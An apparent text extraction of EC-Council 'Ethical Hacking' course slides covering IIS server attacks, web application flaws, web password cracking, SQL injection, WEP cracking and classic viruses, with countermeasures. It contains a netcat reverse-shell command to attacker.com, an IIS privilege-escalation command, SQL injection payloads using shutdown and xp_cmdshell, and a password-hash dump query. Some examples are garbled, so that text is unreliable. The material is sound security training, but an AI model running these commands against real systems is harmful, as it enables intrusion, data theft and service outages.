~ Shoveling a shell back to the attacker's system is easy:
1. Start a netcat listener on the attacker's system:
c:>nc.exe -l -p 2002
2. Use cmdasp.asp to shovel a netcat shell back to the
listener:
c:inetpubscriptsnc.exe -v -e cmd.exe attacker.com
2002
EC-Council
Escalating Privileges on IIS
~ On IIS 4, the LPC ports can be exploited using hk.exe
~ hk.exe will run commands using SYSTEM account on
windows pertaining to intruders to simply add the IUSR
or IWAM account to the local administrator's group.
hk.exe net localgroup administrators
IUSR_machinename /add
~ Note: LPC port vulnerability is patched on IIS 5.0
EC-Council
Hacking Tool: iiscrack.dll
~ iiscrack.dll works like upload.asp and cmd.asp.
~ iiscrack.dll provides a form- based input for attackers to
enter commands to be run with SYSTEM privileges.
~ An attacker could rename iiscrack.dll to idq.dll, upload
the trojan DLL to c:inetpubscripts using
upload.asp and execute it via the web browser using:
http://victim.com/scripts/idq.dll
~ The attacker now has the option to run virtually any
command as SYSTEM
EC-Council
Hacking Tool: ispc.exe
~ ISPC.exe is a Win32 client that is used to connect a
trojan ISAPI DLL (idq.dll).
~ Once the trojan DLL is cpied to the victim webserver
(/sripts/idq.dll), the attacker can execute ispc.exe and
immediately obtain a remote shell running as SYSTEM.
c:>ispc.exe victim.com/scripts/idq.dll
80
EC-Council
Unspecified Executable Path
Vulnerability
~ When executables and DLL files are not preceded by a
path in the registry (eg. explorer.exe does not have a
fixed path by default).
~ Windows NT 4.0 / 2000 will search for the file in the
following locations in this order:
• the directory from which the application loaded.
• the current directory of the parent process,
• ...system32
• ...system
• the windows directory
• the directories specified in the PATH environment
variable
EC-Council
Hacking Tool: CleanIISLog
~ This tool clears the log entries in the IIS log files filtered
by IP address.
~ An attacker can easily cover his trace by removing
entries based on his IP address in W3SVC Log Files.
EC-Council
File System Traversal Counter measures
~ Microsoft recommends setting the NTFS ACLS on
cmd.exe and several other powerful executables to
Administration and SYSTEM: Full Control only.
~ Remove executable permission to IUSR account.
~ This should stop directory traversal in IIS.
~ Apply Microsoft patches and Hotfixes regularly.
EC-Council
Solution: UpdateExpert
~ Update Expert is a Windows administration program
that helps you secure your systems by remotely
managing service packs and hot fixes.
~ Microsoft constantly releases updates for the OS and
mission critical applications, which fix security
vulnerabilities and system stability problems.
~ UpdateExpert enhances security, keeps systems up to
date, eliminates sneaker-net, improves system
reliability and QoS
EC-Council
cacls.exe utility
~Built-in Windows 2000 utility (cacls.exe) can set access control list
(ACLs) permissions globally.
~Let's say you want to change permissions on all executable files to
System:Full, Administrators:Full,
C:>cacls.exe c:myfolder*.exe /T /G
System:F Administrators:F
EC-Council
Network Tool: Whisker
~ Whisker is an automated vulnerability scanning
software which scans for the presence of exploitable
files on remote Web servers.
~ Refer the output of this simple scan given below and
you will see Whisker has identified several potentially
dangerous files on this IIS5Server
EC-Council
Network Tool: Stealth HTTP Scanner
http://www
nstalker.com/nstealth/
~N-Stealth 5 is an impressive
Web vulnerability scanner
that scans over 18000 HTTP
security issues.
~Stealth HTTP Scanner
writes scan results to an easy
HTML report.
~N-Stealth is often used by
security companies for
penetration testing and
system auditing, specifically
for testing Web servers.
EC-Council
Hacking Tool: WebInspect
~ WebInspect is an impressive Web server and
application-level vulnerability scanner which scans over
1500 known attacks.
~ It checks site contents and analyzes for rudimentary
application-issues like smart guesswork checks,
password guessing, parameter passing, and hidden
parameter checks.
~ It can analyze a basic Webserver in 4 minutes
cataloging over 1500 HTML pages.
EC-Council
Network Tool: Shadow Security
Scanner
http://www.safety-lab.com
~ Security scanner is designed to identify known and
unknown vulnerabilities, suggest fixes to identified
vulnerabilities, and report possible security holes within
a network's internet, intranet and extranet
environments.
~ Shadow Security Scanner includes vulnerability
auditing modules for many systems and services.
~ These include NetBIOS, HTTP, CGI and WinCGI,
FTP, DNS, DoS vulnerabilities, POP3,
SMTP,LDAP,TCP/IP, UDP, Registry, Services, Users
and accounts, Password vulnerabilities, publishing
extensions, MSSQL,IBM DB2,Oracle,MySQL,
PostgressSQL, Interbase, MiniSQL and more.
EC-Council
Countermeasures
~ IISLockdown:
• IISLockdown restricts anonymous access to system
utilities as well as the ability to write to Web content
directories.
• It disables Web Distributed Authoring and
Versioning (WebDAV).
• It installs the URLScan ISAPI filter.
~ URLScan:
• UrlScan is a security tool that screens all incoming
requests to the server by filtering the requests based
on rules that are set by the administrator.
EC-Council
Summary
~ Web servers assume critical importance in the realm of Internet
security.
~ Vulnerabilities exist in different releases of popular web servers
and respective vendors patch these often.
~ The inherent security risks owing to compromised web servers
have impact on the local area networks that host these web sites,
even the normal users of web browsers.
~ Looking through the long list of vulnerabilities that had been
discovered and patched over the past few years provide an attacker
ample scope to plan attacks to unpatched servers.
~ Different tools/exploit codes aids an attacker perpetrate web server
hacking.
~ Countermeasures include scanning, for existing vulnerabilities and
patching them immediately, anonymous access restriction,
incoming traffic request screening and filtering.
Ethical Hacking
Module XII
Web Application Vulnerabilities
EC-Council
Module Objective
~ Understanding Web Application Security
~ Common Web Application Security
Vulnerabilities
~ Web Application Penetration Methodologies
~ Input Manipulation
~ Authentication And Session Management
~ Tools: Lynx, Teleport Pro, Black Widow, Web
Sleuth
~ Countermeasures
EC-Council
Understanding Web Application Security
Firewall
Firewall
Database
Web App
Scripts
Web Server
User
EC-Council
Common Web Application Vulnerabilities
~ Reliability of Client-Side Data
~ Special Characters that have not been escaped
~ HTML Output Character Filtering
~ Root accessibility of web applications
~ ActiveX/JavaScript Authentication
~ Lack of User Authentication before performing critical
tasks.
EC-Council
Web Application Penetration
Methodologies
~Information Gathering and Discovery
• Documenting Application / Site Map
• Identifiable Characteristics / Fingerprinting
• Signature Error and Response Codes
• File / Application Enumeration
– Forced Browsing
– Hidden Files
– Vulnerable CGIs
– Sample Files
~Input/Output Client-Side Data Manipulation
EC-Council
Hacking Tool: Instant Source
http://www.blazingtool.com
~Instant Source lets you take a
look at a web page's source code,
to see how things are done. Also,
you can edit HTML directly
inside Internet Explorer!
~The program integrates into
Internet Explorer and opens a
new toolbar window which
instantly displays the source
code for whatever part of the
page you select in the browser
window.
EC-Council
Hacking Tool: Lynx
http://lynx.browser.org
Lynx is a text-based browser used for downloading
source files and directory links.
EC-Council
Hacking Tool: Wget
www.gnu.org/software/wget/wget.html
~ Wget is a command line tool for Windows and Unix that
will download the contents of a web site.
~ It works non-interactively, so it will work in the
background, after having logged off.
~ Wget works particularly well with slow or unstable
connections by continuing to retrieve a document until
the document is fully downloaded.
~ Both http and ftp retrievals can be time stamped, so
Wget can see if the remote file has changed since the
last retrieval and automatically retrieve the new version
if it has.
EC-Council
Hacking Tool: Black Widow
http://softbytelabs .com
~Black widow is a website
scanner, a site mapping
tool, a site ripper, a site
mirroring tool, and an
offline browser program.
~Use it to scan a site and
create a complete profile of
the site's structure, files, E-
mail addresses, external
links and even link errors.
EC-Council
Hacking Tool: WebSleuth
~ http://sandsprite.com/sleuth/
~ WebSleuth is an excellent tool that combines spidering
with the capability of a personal proxy such as Achilles.
EC-Council
Hidden Field Manipulation
~ Hidden fields are embedded within HTML forms to maintain
values that will be sent back to the server.
~ Hidden fields serve as a mean for the web application to pass
information between different applications.
~ Using this method, an application may pass the data without
saving it to a common backend system (typically a database.)
~ A major assumption about the hidden fields is that since they
are non visible (i.e. hidden) they will not be viewed or changed
by the client.
~ Web attacks challenge this assumption by examining the
HTML code of the page and changing the request (usually a
POST request) going to the server.
~ By changing the value the entire logic between the different
application parts, the application is damaged and manipulated
to the new value.
EC-Council
Input Manipulation
~URL Manipulation -CGI Parameter
Tampering
~HTTP Client-Header Injection
~Filter/Intrusion Detection Evasion
~Protocol/Method Manipulation
~Overflows
EC-Council
What is Cross Side Scripting (XSS)?
~ A Web application vulnerable to XSS allows a user to
inadvertently send malicious data to self through that
application.
~ Attackers often perform XSS exploitation by crafting
malicious URLs and tricking users into clicking on
them.
~ These links cause client side scripting languages
)VBScript, JavaScript etc,) of the attacker's choice to
execute on the victim's browser.
~ XSS vulnerabilities are caused by a failure in the web
application to properly validate user input.
EC-Council
Authentication And Session
Management
~Brute/Reverse Force
~Session Hijacking
~Session Replay
~Session Forgoing
~Page Sequencing
EC-Council
Traditional XSS Web Application Hijack
Scenario - Cookie stealing
~User is logged on to a web application and the session is
currently active. An attacker knows of a XSS hole that affects
that application.
~The user receives a malicious XSS link via an e-mail or comes
across it on a web page. In some cases an attacker can even
insert it into web content (e.g. guest book, banner, etc,) and
make it load automatically without requiring user intervention.
EC-Council
XSS Countermeasures
~ As a web application user, there are a few ways to
protect yourselves from XSS attacks.
~ The first and the most effective solution is to disable all
scripting language support in your browser and email
reader.
~ If this is not a feasible option for business reasons,
another recommendation is to use reasonable caution
while clicking links in anonymous e-mails and dubious
web pages.
~ Proxy servers can help filter out malicious scripting in
HTML.
EC-Council
Buffer Overflow in WINHLP32.EXE
~ A buffer-overrun vulnerability in WINHLP32.EXE
could result in the execution of arbitrary code on the
vulnerable system.
~ This vulnerability stems from a flaw in the Item
parameter within WinHLP Command.
~ This exploit would execute in the security context of the
currently logged on user.
~ Microsoft has released Windows 2000 Service Pack 3
(SP3), which includes a fix for this vulnerability.
EC-Council
Hacking Tool: Helpme2.pl
~ Helpme2.pl is an exploit code for WinHelp32.exe
Remote Buffer Overrun vulnerability.
~ This tool generates an HTML file with a given hidden
command.
~ When this HTML file is sent to a victim through e mail,
it infects the victim's computer and executes the hidden
code.
EC-Council
Hacking Tool: WindowBomb
An email sent with this html file attached will create pop-
up windows until the PC's memory gets exhausted.
JavaScript is vulnerable to simple coding such as this.
EC-Council
Hacking Tool: IEEN
http://www.securityfriday.com/ToolDownload/IEen
~IEEN remotely controls Internet Explorer using DCOM.
~If you knew the account name and the password of a remote
machine, you can remotely control the software component on it
using DCOM. For example Internet Explorer is one of the soft
wares that can be controlled.
EC-Council
Summary
~ Attacking web applications is the easiest way to compromise hosts,
networks and users.
~ Generally nobody notices web application penetration, until serious
damage has been done.
~ Web application vulnerability can be eliminated to a great extent
ensuring proper design specifications and coding practices as well as
implementing common security procedures.
~ Various tools help the attacker to view the source codes and scan for
security holes.
~ The first rule in web application development from a security
standpoint is not to rely on the client side data for critical processes.
Using an encrypted session such as SSL / “secure” cookies are
advocated instead of using hidden fields, which are easily manipulated
by attackers.
~ A cross-site scripting vulnerability is caused by the failure of a web
based application to validate user supplied input before returning it to
the client system.
~ If the application accepts only expected input, then the XSS can be
significantly reduced.
Ethical Hacking
Module XIII
Web Based Password Cracking
Techniques
EC-Council
Module Objective
~ HTTP Authentication Basic & Digest
~ NTLM Authentication
~ Certificate Based Authentication
~ Forms Based Authentication
~ Microsoft Passport
~ Password Guessing
~ WebCracker
~ Brutus
~ WWWHACK
~ ObiWan Password Cracker
EC-Council
Basic Authentication
~ Basic authentication is the most basic form of
authentication to web applications.
~ The authentication credentials are sent clear-text with
base64 encryption (can be decoded) and is subject to
eavesdropping and replay attacks.
~ The use of 128 bit SSL encryption can thwart attacks.
EC-Council
Digest Authentication
~ Digest authentication is based on a challenge-response
authentication model.
~ The user makes a request without authentication
credentials and the Web Server replies with a WWW-
Authenticate header indicating credentials.
~ Instead of sending the username and password the
server challenges the client with random nonce.
~ The client responds with the message digest of the
username/password.
EC-Council
NTLM Authentication
~ NTLM Authentication is
Microsoft's proprietary
NT LAN Manager
authentication algorithm
over HTTP. It works on
Microsoft Internet
Explorer only.
~ Integrated Windows
authentication works the
same way as Message
Digest authentication.
EC-Council
Certificate Based Authentication
~ Certificate authentication
is stronger than other
authentication
mechanisms
~ Certificated
authentication uses
public0key cryptography
and digital certificate to
authenticate a user.
Certificates can be stored
in smart cards for even
greater security.
~ There is no current
known attacks against
PKI security so far.
EC-Council
Microsoft Passport Authentication
~ Single signon is the term used to represent a system
whereby users need only remember one username and
password, and be authenticated for multiple services.
~ Passport is Microsoft's universal single sign-in (SSI)
platform.
~ It enables the use of one set of credentials to access any
Passport enabled site such as MSN, Hotmail and MSN
Messenger.
~ Microsoft encourages third-party companies to use
Passport as a Universal authentication platform.
EC-Council
Forms-Based Authentication
~ It is highly customizable authentication mechanism that
uses a form composed of HTML with <FORM> and
<INPUT> tags delineating fields for users to input their
username/password.
~ After the data input via HTTP or SSL, it is evaluated by
some server-side logic and if the credentials are valid,
then a cookie is given to the client to be reused on
subsequent visits.
~ Forms based authentication technique is the popular
authentication technique on the internet.
EC-Council
Hacking Tool: WinSSLMiM
http://www.securiteinfo.com/outils/WinSSLMiM.shtml
~ WinSSLMiM is an HTTPS Man in the Middle attacking
tool. It includes FakeCert, a tool to make fake
certificates.
~ It can be used to exploit the Certificate Chain
vulnerability in Internet Explorer. The tool works under
Windows 9x/2000.
~ Usage:
- FakeCert: fc -h
- WinSSLMiM: wsm -h
EC-Council
Password Guessing
~ Password guessing
attacks can be carried out
manually or via
automated tools.
~ Password guessing can
be performed against all
types of Web
Authentication
The common passwords used are: root, administrator,
admin, operator, demo, test, webmaster, backup, guest,
trial, member, private, beta, [company_name] or
[known_username]
EC-Council
Hacking Tool: WebCracker
WebCracker is a simple tool
that takes text lists of
usernames and passwords
and uses them as
dictionaries to implement
Basic authentication
password guessing.
~It keys on "HTTP 302
Object Moved" response to
indicate successful guess.
~It will find all successful
guesses given in a
username/password.
EC-Council
Hacking Tool: Brutus
http://www.hoobie.net/brutus/
Brutus is a generic password
guessing tool that cracks various
authentication.
~Brutus can perform both
dictionary attacks and brute-
force attacks where passwords
are randomly generated from a
given character.
~Brutus can crack the following
authentication types:
~HTTP (Basic authentication,
HTML Form/CGI); POP3; FTP;
SMB; Telnet
EC-Council
Hacking Tool: ObiWan
http://www.phenoelit.de/o
biwan/docu.html
~ObiWan is a powerful
Web password cracking
tool. It can work through a
proxy.
~ObiWan uses wordlists
and alternations of numeric
or alpha-numeric
characters as possible as
passwords.
~Since Webservers allow
unlimited requests it is a
question of time and
bandwidth to break into a
server system.
EC-Council
Hacking Tool: Munga Bunga
EC-Council
Dictionary Maker
You can download dictionary files from the Internet or
generate your own.
EC-Council
Hacking Tool: PassList
Passlist is another character based password generator.
EC-Council
Query String
~ The query string is the extra bit of data in the URL after
the question mark (?) that is used to pass variables.
~ The query string is used to transfer data between client
and server.
Example:
http://www.mail.com/mail.asp?mailbox=sue&
company=abc%20com
You can attempt to change Joe's mailbox by changing
the URL to:
http://www.mail.com/mail.asp?mailbox=sue&
company=abc%20com
EC-Council
Hacking Tool: cURL
http://curl.haxx.se
cURL is a multi-protocol transfer
library.
~cURL is a free and easy-to-use
client side URL transfer library,
supporting FTP, FTPS, HTTP,
HTTPS, GOPHER, TELNET,
DICT, FILE and LDAP.
~cURL supports HTTPS
certificates, HTTP POST, HTTP
PUT, FTP uploading, Kerberos,
HTTP form based upload,
proxies, cookies, user+password
authentication, file transfer
resume, http proxy tunneling and
more
EC-Council
Cookies
~ Cookies are popular form
of session management.
~ Cookies are often used to
store important fields
such as usernames and
account numbers.
~ Cookies can be used to
store any data and all the
fields can be easily
modified using a
program like CookieSpy
EC-Council
Hacking Tool: ReadCookies.html
Read cookies stored on the computer. this tool can be used
for stealing cookies or cookies hijacking.
EC-Council
Hacking Tool: SnadBoy
http://www.snadboy.com
"Snadboy Revelation" turns back the asterisk in password
fields to plain text passwords.
EC-Council
Summary
~ The "basic" authentication scheme, the simplest method of authentication
and one of the most commonly used authentication method sends
authentication details in clear.
~ Digest authentication, never sent across the network user's credentials in the
clear, but transmits as an MD5 digest of the user's credentials.
~ NTLM, a Microsoft-proprietary protocol authenticates users and computers
based on an authentication challenge and response.
~ Certificated authentication which uses public key cryptography and digital
certificate to authenticate is stronger than other authentication mechanisms.
~ Forms based Authentication is a system in which unauthenticated requests
are redirected to a web form where the unauthenticated users are required to
provide their credentials.
~ Attackers make use of different tools to get better of the authentication
protocols.
~ It is therefore necessary to evaluate the most secure option while designing
web applications to counter cracking activities.
Ethical Hacking
Module XIV
SQL Injection
EC-Council
Module Objective
~ What is SQL Injection?
~ Exploiting the weakness of Server Side
Scripting
~ Using SQL Injection techniques to gain access
to a system
~ SQL Injection Scripts
~ Attacking Microsoft SQL Servers
~ MSSQL Password Crackers
~ Prevention and Countermeasures
EC-Council
Introduction - SQL Injection
EC-Council
OLE DB Errors
The user filled fields are enclosed by single quotation marks
('). So a simple test of the form would be to try using (') as
the username.
Lets us see what happens if we just enter ' in a form that is
vulnerable to SQL insertion.
If you get this error, then we can try
SQL injection techniques.
EC-Council
Input Validation attack
Input validation attack occurs here on a website
EC-Council
Login Guessing & Insertion
~ The attacker can try to login without a password.
Typical usernames would be 1=1 or any text within
single quotes.
~ The most common problem seen on Microsoft MS-SQL
boxes is the default <blank>sa password.
~ The attacker can try to guess the username of an
account by querying for similar user names (ex: ‘ad%’ is
used to query for “admin”).
~ The attacker can insert data by appending commands or
writing queries.
EC-Council
Shutting Down SQL Server
~ One of SQL Server's most powerful commands is
SHUTDOWN WITH NOWAIT, which causes it to
shutdown, immediately stopping the Windows service.
Username: ' ; shutdown with nowait; --
Password [Anything]
~ This can happen if the script runs the following query:
select userName from users where
userName='; shutdown with nowait;-' and
user_Pass=' '
EC-Council
Extended Stored Procedures
~ There are several extended stored procedures that can
cause permanent damage to a system.
~ We can execute an extended stored procedure using our
login form with an injected command as the username
as follows:
Username: ' ; exec master..xp_xxx; --
Password: [Anything]
Username: ' ; exec master..xp_cmdshell ' iisreset' ; --
Password: [Anything]
EC-Council
SQL Server Talks!
This command uses the 'speech.voicetext' object, causing
the SQL Server to speak:
EC-Council
Hacking Tool: SQLDict
http://ntsecurity.nu/cgi-
bin/download/sqldict.exe.pl
~"SQLdict" is a dictionary
attack tool for SQL Server.
~It lets you test if the
accounts are strong enough to
resist an attack or not.
EC-Council
Hacking Tool: SQLExec
~This tool executes commands on compromised MIcrosoft SQL Servers
using xp_cmdshell stored procedure.
~It uses default sa account with NULL password. But this can be modified
easily.
USAGE: SQLExec www.target.com
EC-Council
Hacking Tool: sqlbf
http://www.cqure.net/tools.jsp?id=10
~ Sqlbf is a SQL Sever Password Auditing tool. This tool should
be used to audit the strength of Microsoft SQL Server
passwords offline. The tool can be used either in BruteForce
mode or in Dictionary attack mode. The performance on a
1GHZ pentium (256MB) machine is around 750,000
guesses/sec.
~ To be able to perform an audit, one needs the password hashes
that are stored in the sysxlogins table in the master database.
~ The hashes are easy to retrieve although you need a privileged
account to do so, like an sa account. The query to use would be:
select name, password from master..sysxlogins
~ To perform a dictionary attack on the retrieved hashes:
sqlbf -u hashes.txt -d dictionary.dic -r
out.rep
EC-Council
Hacking Tool: SQLSmack
~ SQLSmack is a Linux based Remote Command
Execution for MSSQL.
~ The tool allows when provided with a valid username
and password on a remote MS SQL Server to execute
commands by piping them through the stored
procedure master..xp_cmdshell
EC-Council
Hacking Tool: SQL2.exe
~ SQL2 is a UDP Buffer Overflow Remote Exploit hacking
tool.
EC-Council
Preventive Measures
~ Minimize Privileges of Database Connection
~ Disable verbose error messages
~ Protect the system account ‘sa’
~ Audit Source Code
• Escape Single Quotes
• Allow only good input
• Reject known bad input
• Restrict length of input
EC-Council
Summary
~ SQL Injection is an attack methodology that targets the
data residing in a database through the firewall that
shields it.
~ It attempts to modify the parameters of a Web-based
application in order to alter the SQL statements that are
parsed to retrieve data from the database.
~ Database footprinting is the process of mapping out the
tables on the database and is a crucial tool in the hands
of an attacker.
~ Exploits occur due to coding errors as well as
inadequate validation checks .
~ Prevention involves enforcing better coding practices
and database administration procedures.
Ethical Hacking
Module XV
Hacking Wireless Networks
EC-Council
Module Objective
~ Introduction to 802.11
~ What is WEP?
~ Finding WLANs
~ Cracking WEP Keys
~ Sniffing Traffic
~ Wireless DoS attacks
~ WLAN Scanners
~ WLAN Sniffers
~ Securing Wireless Networks
~ Hacking Tools
EC-Council
Introduction to Wireless Networking
~ Wireless networking technology is becoming
increasingly popular but at the same time has
introduced many security issues
~ The popularity in wireless technology is driven by two
primary factors – convenience and cost.
~ A Wireless local area network (WLAN) allows workers
to access digital resources without being locked into
their desks.
~ Laptops could be carried into meetings or even into
Starbucks café tapping into the wireless network. This
convenience has become affordable.
EC-Council
What is 802.11x ?
~ Wireless LAN standards are defined by the IEEE’s
802.11 working group. WLANs come in three flavors:
~ 802.11b
• Operates in the 2.4000GHz to 2.2835GHz frtequency range
and can operate at up to 11 megabits per second.
~ 802.11a
• Operates in the 5.15-5.35GHz to 5.725-5.825GHz frequency
range and can operate at up to 54 megabits per second.
~ 802.11g
• Operates in the 2.4GHz frequency range (increased bandwidth
range) and can operate at up to 54 megabits per second.
Note: WEP standards are defined in the 802.11 standard
and not the individual standards. WEP vulnerabilities
have the potential to affect all flavors of 802.11
networks.
EC-Council
Setting Up WLAN
~ When setting up a WLAN, the channel and service set
identifier (SSID) must be configured in addition to
traditional network settings such as IP address and a
subnet mask.
~ The channel is a number between 1and 11 (1 and 13in
Europe) and designates the frequency on which the
network will operate.
~ The SSID is an alphanumeric string that differentiates
networks operating on the same channel.
~ It is essentially a configurable name that identifies an
individual network. These settings are important factors
when identifying WLANs and sniffing traffic.
EC-Council
SSIDs
~ The SSID is a unique identifier that wireless networking
devices use to establish and maintain wireless
connectivity
~ SSID acts as a single shared password between access
points and clients.
~ Security concerns arise when the default values are not
changed, as these units can be easily compromised.
~ A non-secure access mode, allows clients to connect to
the access point using the configured SSID, a blank
SSID, or an SSID configured as “any.”
EC-Council
What is WEP?
~ WEP is a component of the IEEE 802.11 WLAN
standards. Its primary purpose is to provide for
confidentiality of data on wireless networks at a level
equivalent to that of wired LANs.
~ Wired LANs typically employ physical controls to
prevent unauthorized users from connecting to the
network and viewing data. In a wireless LAN, the
network can be accessed without physically connecting
to the LAN.
~ IEEE chose to employ encryption at the data link layer
to prevent unauthorized eavesdropping on a network.
This is accomplished by encrypting data with the RC4
encryption algorithm.
EC-Council
MAC Sniffing & AP Spoofing
~ MAC addresses are easily sniffed by an attacker since
they must appear in the clear even in when WEP is
enabled.
~ An attacker can use those “advantages” in order to
masquerade as a valid MAC address by programming
the wireless card, and get into the wireless network and
use the wireless pipes.
~ Spoofing MAC address is very easy. Using packet-
capturing software, an attacker can determine a valid
MAC address using one packet.
~ To perform a spoofing attack, an attacker must set up
an access point (rogue) near the target wireless network
or in a place where a victim may believe that wireless
Internet is available.
EC-Council
Denial of Service attacks
~ Wireless LANs are
susceptible to the same
protocol-based attacks
that plague wired LAN
~ WLANs send
information via radio
waves on public
frequencies, thus they
are susceptible to in
advertent or deliberate
interference from traffic
using the same radio
band.
EC-Council
Hacking Tool: NetStumbler
http://www.netstumbler.org
~ Netstumbler is a high level WLAN scanner. It operates
by sending a steady stream of broadcast packets on all
possible channels.
~ Access Points (AP) respond to broadcast packets to
verify their existence, even if beacons have been
disabled.
~ NetStumbler displays:
• Signal Strength
• MAC Address
• SSID
• Channel details
EC-Council
Hacking Tool: AiroPeek
http://www.wildpackets.com
~Airopeek is a
comprehensive packet
analyzer for IEEE 802.11
wireless LANs, supporting all
higher level network
protocols such as TCP/IP,
Apple Talk, NetBUI and IPX.
~In addition, AiroPeek
quickly isolates security
problems, fully decodes
802.11a and 802.11b WLAN
protocols, and analyzes
wireless network
performance with accurate
identification of signal
strength, channel and data
rates.
EC-Council
Hacking Tool: Airsnort
http://airsnort.shmoo.com/
~ AirSnort is a wireless LAN (WLAN) tool which recovers
encryption keys. AirSnort operates by passively
monitoring transmissions, computing the encryption
key when enough packets have been gathered.
~ AirSnort requires approximately 5-10 million encrypted
packets to be gathered.
~ Once enough packets have been gathered, AirSnort can
guess the encryption password in under a second.
EC-Council
Hacking Tool: Kismet
~ Kismet is a 802.11b
wireless network sniffer
which separates and
identifies different
wireless networks in the
area.
~ Kismet works with any
wireless card which is
capable of reporting raw
packets.
EC-Council
WEPCrack
~ WEPCrack is an open source tool for breaking 802.11
WEP secret keys.
~ While Airsnort has captured the media attention,
WEPCrack was the first publically available code that
demonstrated the above attack.
~ The current tools are Perl based and are composed of
the following scripts:
WeakIVGen.pl, prism-getIV.pl, WEPCrack.pl
EC-Council
Other Tools
~ Network discovery tools run on 802.11 stations and
passively monitor beacon and probe response frames.
They typically display discovered devices by SSID,
channel, MAC address and location.
~ Vulnerability assessment tools, in addition to network
discovery, sniff traffic to spot security policy violations.
~ Traffic monitoring and analysis tools also provide
discovery and vulnerability alerting. In addition, they
capture and examine packet content.
~ IDSes may use signature analysis, protocol inspection,
rules enforcement and/or anomaly detection.
EC-Council
WIDZ, Wireless Intrusion Detection
System
~WIDZ version 1 is a proof of concept IDS system for 802.11 that
guards APs and monitors local for potentially malevolent activity.
~It detects scans, association floods, and bogus/Rogue APs. It can
easily be integrated with SNORT or RealSecure.
EC-Council
Securing Wireless Networks
~ MAC Address Filtering
This method uses a list of MAC addresses of client
wireless network interface cards that are allowed to
associate with the access point.
~ SSID (NetworkID)
The first attempt to secure wireless network was the use
of Network ID (SSID). When a wireless client wants to
associate with an access point, the SSID is transmitted
during the process. The SSID is a seven digit
alphanumeric id that is hard coded into the access point
and the client device.
~ Firewalls
Using a firewall to secure a wireless network is probably
the only security feature that will prevent unauthorized
access.
EC-Council
Out of the box security
EC-Council
Radius: used as additional layer in the
security
EC-Council
Maximum Security: Add VPN to
Wireless LAN
EC-Council
Summary
~ A wireless enables a mobile user to connect to a local area network (LAN)
through a wireless (radio) connection.
~ Wired Equivalent Privacy (WEP), a security protocol, specified in the IEEE
Wi-Fi standard, 802.11b, that is designed to provide a wireless local area
network (WLAN) with a level of security and privacy comparable to what is
usually expected of a wired LAN.
~ WEP is vulnerable because of relatively short IVs and keys that remain static.
~ Even if WEP is enabled, MAC addresses can be easily sniffed by an attacker as
they appear in the clear format. Spoofing MAC address is also easy.
~ If an attacker holds wireless equipment nearby a wireless network, he will be
able to perform a spoofing attack by setting up an access point (rogue) near
the target wireless network.
~ Wireless networks are extremely vulnerable to DoS attacks.
~ A variety of hacking and monitoring tools are available for the Wireless
networks as well.
~ Securing wireless networks include adopting a suitable strategy as MAC
address filtering, Fire walling or a combination of protocol based measures.
Ethical Hacking
Module XVI
VIRUSES
EC-Council
Module Objective
~ Chernobyl
~ ExploreZip
~ I Love You
~ Melissa
~ Pretty Park
~ Code Red Worm
~ W32/Klez
~ BugBear
~ W32/Opaserv Worm
~ Anti-Virus Software
EC-Council
W32.CIH.Spacefiller (a.k.a Chernobyl)
~ Chernobyl is a deadly virus. Unlike the other viruses
that have surfaced recently, this one is much more than
a nuisance.
~ If infected, Chernobyl will erase data on your hard
drive, and may even keep your machine from booting
up at all.
~ There are several variants in the wild. each variant
activates on a different date. Version 1.2 on April 26th,
1.3 on June 26th, and 1.4 on the 26th of every month.
EC-Council
Win32/Explore.Zip Virus
~ ExploreZip is a Win32-based e-mail worm. It searches
for Microsoft Office documents on your hard drive and
network drives.
~ When it finds any Word, Excel, or PowerPoint
documents using the following extensions: .doc, .xls and
.ppt, it erases the contents of those files. It also emails
itself to any one who send you an e-mail.
~ ExploreZip arrives as an email attachment. The
message will most likely come from someone you know,
and the body of the message will read:
"I received your email and I shall send you a reply
ASAP. Till then, take a look at the attached Zipped
docs." The attachment will be named "Zipped_files.exe"
and have a WinZip icon. Double clicking the program
infects your computer.
EC-Council
I Love You Virus
~ LoveLetter is a Win32-based e-mail
worm. It overwrites certain on your hard
drive(s) and sends itself out to everyone
in your Microsoft Outlook address book.
~ LoveLetter arrives as an email
attachment named: LOVE-LETTER-
FOR-YOU.TXT.VBS though new variants
have different names including
VeryFunny.vbs, virus_warning.jpg.vbs
and protect.vbs
EC-Council
What is SQL Insertion Vulnerability?
~ User Controlled Data is placed into an SQL
query without being validated for correct
format or embedded escape strings.
~ Affects majority of applications which use a
database backend and don't force variable
types.
~ At least 50% of the large e-commerce sites and
about 75% of the medium to small sites are
vulnerable.
~ Improper validation in CFML, ASP, JSP and
PHP are the most frequent causes.
EC-Council
Melissa Virus
~ Melissa is a Microsoft Word macro virus.
~ Through macros, the virus alters the Microsoft Outlook email program
so that the virus gets sent to the first 50 people in your address book.
~ It does not corrupt any data on your hard drive or make your
computer crash. It just changes some Word settings and sends itself to
the people you don't want to infect.
~ Melissa Virus Infection
• Melissa arrives as an email attachment.
• The subject of the message containing the virus will read: "Important
message from" followed by the name of the person whose email account it
was sent from.
• The body of the message reads: Here's the document you asked for...don't
show anyone else ;-) Double clicking the attached Word document
(typically named LIST.DOC) will infect your machine.
EC-Council
Pretty Park
~Pretty Park is a privacy invading worm.
Every 30 seconds, it tries to e-mail itself to
the e-mail addresses in your Microsoft
Outlook address book.
~It has also been reported to connect your
machine to a custom IRC channel for the
purpose of retrieving passwords from your
system.
~Pretty park arrives as an email
attachment. Double clicking the
PrettyPark.exe or Files32.exe program
infects your computer.
~You may see the Pipes screen after
running the executable.
EC-Council
BugBear Virus
~ This worm propagates via shared network folders and via email.
~ It also terminates antivirus programs, act as a backdoor server
application, and sends out system passwords - all of which
compromise security on infected machines. BugBear Infection
• This worm fakes the FROM field and obtains the recipients for its
email from email messages, address books and mail boxes on the
infected system. It generates the filename for the attached copy of
itself from the following:
• A combination of text strings: setup, card, docs, news, Image,
images, pics, resume, photo, video, music or song data; with any of
the extensions: SCR, PIF, or EXE. An existing system file appended
with any of the following extensions: SCR, PIF or EXE.
• On systems with un patched Internet Explorer 5.0 and 5.5, the
worm attachment is executed automatically when messages are
either opened or previewed using Microsoft Outlook or Outlook
Express.
EC-Council
Klez
